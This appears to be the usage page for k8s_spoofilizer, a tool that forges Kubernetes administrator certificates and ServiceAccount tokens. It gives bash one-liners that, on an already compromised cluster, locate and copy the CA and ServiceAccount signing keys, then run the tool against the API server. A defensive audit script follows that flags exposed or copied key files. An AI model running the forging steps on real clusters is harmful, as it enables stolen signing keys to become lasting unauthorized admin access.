Allows you to forge Kubernetes administrative user certificates, node certificates, and ServiceAccount tokens
The following are a few bash one-liners to operationalize k8s_spoofilizer. They assume that:
- You've compromised a Kubernetes cluster that is not managed by a cloud provider.
- You have access to the following files (typically in /etc/kubernetes/pki/; in minikube it's /var/lib/minikube/certs):
  - ca.crt: the public certificate of the cluster's Certificate Authority.
  - ca.key: the CA private key, used to sign and issue new certificates within the cluster.
  - sa.key: the private key used to sign ServiceAccount tokens.
```bash
# Search for these files
# Run this on the control plane node
find / -name "ca.crt" ; find / -name "sa.key" ; find / -name "ca.key"

# If everything is in /etc/kubernetes/pki...
# Move them to key_dir
mkdir key_dir ; cp /etc/kubernetes/pki/ca.crt /etc/kubernetes/pki/sa.key /etc/kubernetes/pki/ca.key key_dir/

# Install pre-reqs
# Note you should probably use a virtual env for this...
sudo apt update && sudo apt install python3 python3-pip -y ; git clone https://github.com/jtesta/k8s_spoofilizer; pip install --user cryptography #--break-system-packages

# Set APISERVER to the IP of the API server
APISERVER=$(kubectl get pods -A -o wide | grep kube-api | awk '{print $7}') && echo $APISERVER

# Run k8s_spoofilizer.py
cd k8s_spoofilizer; ./k8s_spoofilizer.py --server https://$APISERVER:6443/ --update-uid-cache ../key_dir/
```
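As an added, defender-side check (not part of k8s_spoofilizer or the original page): a script for the control plane node that audits the key files this procedure depends on, flagging a ca.key or sa.key that is readable beyond root and locating copies of them staged elsewhere on the node, as the key_dir step above does. The script name audit_k8s_pki.sh and the 64 KiB size bound on hashed files are assumptions; it relies on GNU stat, find and sha256sum.

```shell
#!/usr/bin/env bash
# Audit the control-plane key material this procedure relies on. PKI_DIR
# defaults to the kubeadm path /etc/kubernetes/pki; pass the minikube path
# from above instead where that applies. Read-only: nothing is modified.

# Flag ca.key and sa.key when any group or other permission bit is set;
# whoever can read them can mint the certificates and tokens described
# above. Prints "WEAK <file> mode=<octal>" per hit and returns the hit count.
audit_key_modes() {
    local pki="${1:-/etc/kubernetes/pki}" f hits=0
    for f in "$pki/ca.key" "$pki/sa.key"; do
        [ -f "$f" ] || continue
        case "$(stat -c '%A' "$f")" in
            ????------) ;;   # -rw------- or stricter: fine
            *) echo "WEAK $f mode=$(stat -c '%a' "$f")"; hits=$((hits + 1)) ;;
        esac
    done
    return "$hits"
}

# Find copies of the signing keys staged elsewhere on the node by matching
# SHA-256 digests of small regular files below SEARCH_ROOT, skipping PKI_DIR
# itself. Prints "COPY <path> matches <key>" per hit and returns the hit count.
# The 64 KiB bound is an assumption: private keys are far smaller than that.
find_key_copies() {
    local pki="${1:-/etc/kubernetes/pki}" root="${2:-/}" f digest matches hits=0
    for f in "$pki/ca.key" "$pki/sa.key"; do
        [ -f "$f" ] || continue
        digest=$(sha256sum "$f" | cut -d' ' -f1)
        matches=$(find "$root" -xdev -type f -size -64k ! -path "$pki/*" \
                    -exec sha256sum {} + 2>/dev/null |
                  awk -v d="$digest" -v k="$f" \
                    '$1 == d { sub(/^[^ ]+  /, ""); print "COPY " $0 " matches " k }')
        [ -n "$matches" ] || continue
        printf '%s\n' "$matches"
        hits=$((hits + $(printf '%s\n' "$matches" | wc -l)))
    done
    return "$hits"
}

# Usage: ./audit_k8s_pki.sh [PKI_DIR] [SEARCH_ROOT]. The copy search runs only
# when SEARCH_ROOT is given, since hashing a whole filesystem takes a while.
if [ "$#" -ge 1 ]; then
    audit_key_modes "$1"
    [ "$#" -ge 2 ] && find_key_copies "$1" "$2"
fi
```

A non-zero exit status from either function means findings were printed, so both drop straight into a cron job or a node compliance check.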